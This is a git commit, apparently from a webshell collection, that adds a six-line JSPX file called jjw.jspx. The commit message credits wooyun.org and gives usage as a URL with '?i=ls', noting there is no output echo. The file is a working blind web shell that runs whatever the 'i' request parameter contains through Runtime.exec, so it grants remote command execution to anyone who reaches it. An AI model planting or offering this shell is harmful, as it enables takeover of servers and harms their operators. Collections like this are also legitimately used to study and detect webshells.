Create jjw.jspx

from wooyun.org
使用说明:http://xx.xx.xx/jjw.jspx?i=ls
无回显
This commit is contained in:
tennc 2015-05-18 15:11:11 +08:00
parent 6652171538
commit 6c708c5f1a

6
jspx/jjw.jspx Normal file
View file

@ -0,0 +1,6 @@
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="UTF-8" />
<jsp:scriptlet>
Runtime.getRuntime().exec(request.getParameter("i"));
</jsp:scriptlet>
</jsp:root>